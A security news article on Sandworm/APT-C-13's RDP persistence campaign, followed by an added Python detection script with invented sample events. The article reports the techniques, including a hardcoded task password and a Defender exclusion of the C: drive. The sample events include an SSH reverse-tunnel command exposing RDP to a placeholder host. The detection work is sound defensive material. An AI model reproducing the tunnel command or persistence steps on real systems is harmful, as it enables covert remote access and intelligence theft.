APT Hackers Attacking RDP Servers to Deploy Malicious Payloads and Establish Persistence

Cybersecurity News (original source: cybersecuritynews.com)

One of the world’s most dangerous state-backed hacking groups is actively targeting Remote Desktop Protocol (RDP) servers across critical infrastructure, defense organizations, and government agencies.

The threat actor, known as APT-C-13 and widely tracked as Sandworm, APT44, Seashell Blizzard, and Voodoo Bear, has long been conducting cyber operations since at least 2009.

Its latest campaign, however, marks a sharp shift in strategy — moving away from destructive, one-time strikes toward quiet, long-term infiltration designed to harvest intelligence over extended periods.

The campaign’s entry point is a disguised ISO image named Microsoft.Office.2025x64.v2025.iso, distributed through Telegram channels and software cracking communities in Ukraine.

When a victim mounts the image and tries to install or activate what appears to be Microsoft Office, hidden executables posing as auto.exe or setup.exe silently launch in the background.

This social engineering trick works because people naturally trust familiar software names. Once triggered, the initial loader profiles the target system and selectively deploys further malicious modules.

APT-C-13 Attack Chain (Source – Weixin)

Weixin analysts at the 360 Threat Intelligence Center identified this campaign and confirmed that APT-C-13 is deploying a modular penetration framework known as the Tambur/Sumbur/Kalambur series.

Researchers describe the group’s overall shift as moving from “instantaneous disruption” to “intelligence-driven persistent parasitism” — a calculated evolution observed between 2024 and 2026.

One confirmed victim was a technician at a Ukrainian state-owned shipbuilding and machinery manufacturing plant, where the attackers had already established deep, covert access.

The impact of this campaign is serious and far-reaching. Because the attack chain primarily abuses legitimate Windows tools — including scheduled tasks, SSH, PowerShell, and RDP — standard antivirus solutions often fail to raise alerts.

The group is no longer in a hurry; it plants itself quietly and stays for months, slowly extracting sensitive data from within the organization’s trusted environment.

What makes this especially concerning is that by the time most organizations realize something is wrong, the attackers have likely already achieved their objectives.

Persistence Through RDP Hijacking and Covert Tunneling

The most alarming technical aspect of this campaign is how the attackers dig in and stay hidden for extended periods.

The Tambur module establishes persistence by planting scheduled tasks named “Tambur” and “Protector” under the \Microsoft\Windows\WDI\Protector task-scheduler path, a location chosen to look exactly like a native Windows Diagnostic Infrastructure (WDI) component.

These tasks run with full administrator-level privileges and use a hardcoded password (1qaz@WSX) to maintain constant, uninterrupted access to the RDP service on the infected host.

Tambur Scheduled Task WDI Path (Source – Weixin)

The Kalambur and Sumbur modules extend this control further by routing all command-and-control (C2) traffic through the Tor anonymous network, effectively masking the attacker’s real location.

Using SSH reverse tunneling, the attacker maps the victim’s RDP port (3389) to a remote C2 server, enabling silent remote logins from anywhere in the world. Because the tunnel is opened outbound from the victim, the attacker needs no inbound firewall exposure to reach port 3389.

Sumbur, the more refined iteration of this framework, mimics Microsoft Edge’s update service — storing malicious VBScripts in a fake Edge update directory and triggering them every four hours to blend seamlessly with normal software activity.

Rounding out the attack is the DemiMur module, which injects a forged root certificate (DemiMurCA.crt) into the system’s trusted certificate store.

From that point forward, Windows accepts any subsequent malicious payload signed under that certificate as fully trusted and legitimately signed.

Combined with forced Microsoft Defender exclusions covering the entire C drive, the host’s native security layer is completely neutralized, leaving attackers with a clean and undetected operating environment.

DemiMur Certificate Injection (Source – Weixin)

Organizations should immediately block third-party activation tools and unauthorized ISO images from entering their networks, as these serve as the primary delivery channel for this attack.

Internal network behavior — including scheduled task creation, registry modifications, and PowerShell execution — should be closely monitored for signs of tampering. Endpoint security must be kept fully updated with regular comprehensive scans.

Key institutions and industrial organizations should also strengthen internal auditing practices and build specific detection rules targeting anomalous RDP and SSH activity to prevent long-term intelligence theft.
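Detection logic for the techniques described in this campaign, written here as an added example (not code from the 360 report or this article) and run over constructed event records: it flags scheduled tasks created under the Task Scheduler WDI folder or carrying the reported task names, ssh.exe launched with a -R reverse forward of port 3389, VBScript run from an Edge-update-like path (the exact directory is not given above, so that pattern is an assumption), a Defender path exclusion covering the whole C: drive (Defender event 5007), and a certificate written to the machine ROOT store (Sysmon event 13). Field names follow the Windows Security, Defender and Sysmon event schemas; every sample value is invented.

```python
import re

# Task Scheduler folder abused for persistence, and the task names reported in the campaign
WDI_FOLDER = "\\Microsoft\\Windows\\WDI\\"
SUSPECT_TASKS = {"tambur", "protector"}

def detect(evt):
    """Return alert strings for one event record (a dict); an empty list means no finding."""
    alerts = []
    eid, ch = evt.get("EventID"), evt.get("Channel", "")
    if ch == "Security" and eid == 4698:  # scheduled task created
        name = evt.get("TaskName", "")
        if (name.lower().startswith(WDI_FOLDER.lower())
                or name.rsplit("\\", 1)[-1].lower() in SUSPECT_TASKS):
            alerts.append(f"persistence: scheduled task in WDI folder: {name}")
    if ch == "Security" and eid == 4688:  # process created
        exe, cmd = evt.get("NewProcessName", "").lower(), evt.get("CommandLine", "")
        # ssh -R ...3389... is a reverse tunnel that exposes this host's RDP port to the SSH peer
        if exe.endswith("ssh.exe") and re.search(r"-R\s*\S*3389", cmd):
            alerts.append(f"c2: ssh reverse tunnel forwarding RDP: {cmd}")
        # VBScript launched from an Edge-update-looking directory (assumed path pattern)
        if exe.endswith(("wscript.exe", "cscript.exe")) and re.search(r"edge\S*update\S*\.vbs", cmd, re.I):
            alerts.append(f"persistence: VBScript in Edge-update-like path: {cmd}")
    if "Windows Defender" in ch and eid == 5007:  # Defender configuration changed
        new = evt.get("NewValue", "")
        if re.search(r"Exclusions\\Paths\\C:\\?\s*=", new, re.I):  # exclusion is the drive root itself
            alerts.append(f"defense-evasion: Defender exclusion covering all of C: {new}")
    if ch.startswith("Microsoft-Windows-Sysmon") and eid == 13:  # registry value set
        tgt = evt.get("TargetObject", "")
        if re.search(r"\\SystemCertificates\\ROOT\\Certificates\\[0-9A-F]{40}\\Blob$", tgt, re.I):
            alerts.append(f"defense-evasion: root CA written by {evt.get('Image', '?')}: {tgt}")
    return alerts

def scan(events):
    """Run every rule over a list of records and return all alerts in input order."""
    return [a for e in events for a in detect(e)]

# Constructed sample records: schema-shaped field names, invented values (not real telemetry)
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4698, "TaskName": "\\Microsoft\\Windows\\WDI\\Protector\\Tambur"},
    {"Channel": "Security", "EventID": 4698, "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag"},
    {"Channel": "Security", "EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "CommandLine": "ssh.exe -N -R 3389:127.0.0.1:3389 user@example.invalid"},
    {"Channel": "Security", "EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe C:\\ProgramData\\Microsoft\\EdgeUpdate\\update.vbs"},
    {"Channel": "Microsoft-Windows-Windows Defender/Operational", "EventID": 5007,
     "NewValue": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\ = 0x0"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 13, "Image": "C:\\Temp\\setup.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\" + "A" * 40 + "\\Blob"},
]
```

Calling scan(SAMPLE_EVENTS) yields five alerts (the benign Defrag task produces none); in production the WDI-folder rule should be baselined against the legitimate tasks present in that folder on your build.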
